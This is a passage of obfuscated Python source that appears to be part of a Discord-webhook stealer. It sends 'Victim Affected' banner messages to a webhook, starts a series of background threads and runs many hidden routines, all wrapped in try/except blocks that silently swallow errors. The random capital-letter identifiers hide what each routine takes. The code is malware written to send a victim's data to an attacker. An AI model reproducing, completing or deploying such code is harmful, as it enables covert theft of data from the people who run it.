        ODEFLRZOMMYJQBKBZAFWCMMFFJJQNHABPWHPSRAYQXTZZQYOYTDSXIHKMDCBLELQPTWUSJ.send(embed=embed, username=FYFMYAFLJDYUCGHTYCCAPJNVUNHWJWIQAXESUCAINNDVRADDNAYRYOGMTXE, avatar_url=COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF)

try: requests.post(JWYVDZHULQYWOKJLEHQDUESUOVMLMYRUDBDTLOWPXWFUXKESODFHFUQJVZIVWAEAIQFRPAONONS, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': FYFMYAFLJDYUCGHTYCCAPJNVUNHWJWIQAXESUCAINNDVRADDNAYRYOGMTXE, 'avatar_url': COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF,})
except: pass
try: threading.Thread(target=JXPUTJLJOQNWZYYZVOKXZRESYRZRUVLSEFFZNNUFEPUHUUKHJMNIOLQZGVPUIOIIETAWUASJBBSVDIAEEOJTSGLJLUJ).start()
except: pass
try: threading.Thread(target=SYKEXMSKGVNITWPRUREELQTWHKSHKDIJOQRHZXJXDEVWGZJGMWPQAFSNCCNTTBQC).start()
except: pass
try: threading.Thread(target=CUWKXJUORZQSTMOPFHCJHGGJXLBZAPWBMUTBKWRELMEIOHNVRUFOXLDQTTSIVRXLONKRHAEBSXFUEIVGOILYGVKXMBFXMLIV).start()
except: pass
try: threading.Thread(target=WBHSHBHWGYCOOZZWKLAYWRFCKBTGKBESMDRFQSOMGHVKXFHYTQGKRNHORDDGEOXPNPFDGNKG).start()
except: pass
try: HKTJZNGTSWRDCVJCBBETNEOXIUGKWHSHNWIJUJRMBPCYGSMZGLDEHZBMJTFLKJJNWECSHESLAQ()
except: pass
try: RYPJBCRTOJDEHHXGNROCNLTAOJNGBBCUFTIXDFLXIOCDQNTJEXWTXIFCJOQXPHOZZUKAMSBLPVFHGRDBLVKQHTOETQJAN()
except: pass
try: VLXNDCPPRDXRBWXWFLXSOYATPVYPAYHJLYFELFYLSQPJDZQKICTHKYEYBJVDKDPABNSPCQSMQQMRISIEJXPYV()
except: pass
try: EFDVRPPLDSCYSUXNYWVMYZNVUJUPPXGZDZBRUJFPYPNPHEWGCBNNSCFMCJDZNKISPK()
except: pass
try: MQQGAFMZZMLIOFBFQZHBPFSUYEDCUUOMWKAOIFOHRHHRZJHHMBWLTKWBEQUESTVODDZZZAFZIEGSSTODFPJSVTVMDXBRNVGE()
except: pass
try: TVZWRFYPNWPGVKKMQQVJEAZDFMZQKSMQZBJBPQNWMCYMVVXSWNV()
except: pass
try: IALNNAOTDDMXONISTSGWNBKCOTBVIBRDKDRWWKGMZQXMXVMUCSJIYDTUHZCCBIWFV()
except: pass
try: BFXWTRMHMJILTBPFLUFNMPKWOWSHVFGINTLVBHGJOCRGNOEJQYDMTJHKCLLASW()
except: pass
try: requests.post(JWYVDZHULQYWOKJLEHQDUESUOVMLMYRUDBDTLOWPXWFUXKESODFHFUQJVZIVWAEAIQFRPAONONS, json={'content': f'****╚══════════════════{AKUYUPHZBZDZZQGNDZKGHKPGKCDHEHNFPKBLLZXCPTSJMMZHYYQIILJSPEITNEGWVHHXJUWUUXSRXINILDFRVSBHKUIUZXJ}══════════════════╝****', 'username': FYFMYAFLJDYUCGHTYCCAPJNVUNHWJWIQAXESUCAINNDVRADDNAYRYOGMTXE, 'avatar_url': COASRMXSAMPXHOXYUWRRBRLZMBUSVLSKJRFSVWDYBTJCPHVTVJCF})
except: pass
try: threading.Thread(target=ABGTSNFDNFCTAFIKMGEZRNQQHWLHOVGOFPKZWUKVGXYWTAMHCASHQKZBDZIUARYMALFGERGDHKMOFLGKOKSCULIXHFEU).start()
except: pass
try: threading.Thread(target=RQJROHGFARSPDMNETMXNHHZUOBKUZDGVNFUMCNAOKKHUASIURHRXOQZAAFRFOYGPVIXKXTCKTNLYWHKDIBLUMBYJAJYRPA).start()
except: pass
try: threading.Thread(target=PKGJRJFDNCRITZTRNPHGNDMKSCLQCTTFHBJRJSUNYXGCZSCZTBTCCBRRZTLSLHQPLTCXJSTTMXSTTMDRWUJMPPPBNTOGG).start()
except: pass
try: threading.Thread(target=NVXGTKFYUFIAQYKFBGUFGHEHPRMVIOUXIFRACFFAWTUVVWOTFSCZFCWXTVDXKDBKXEMTEMYLLRDSCIIHPCONKJVASE).start()
except: pass
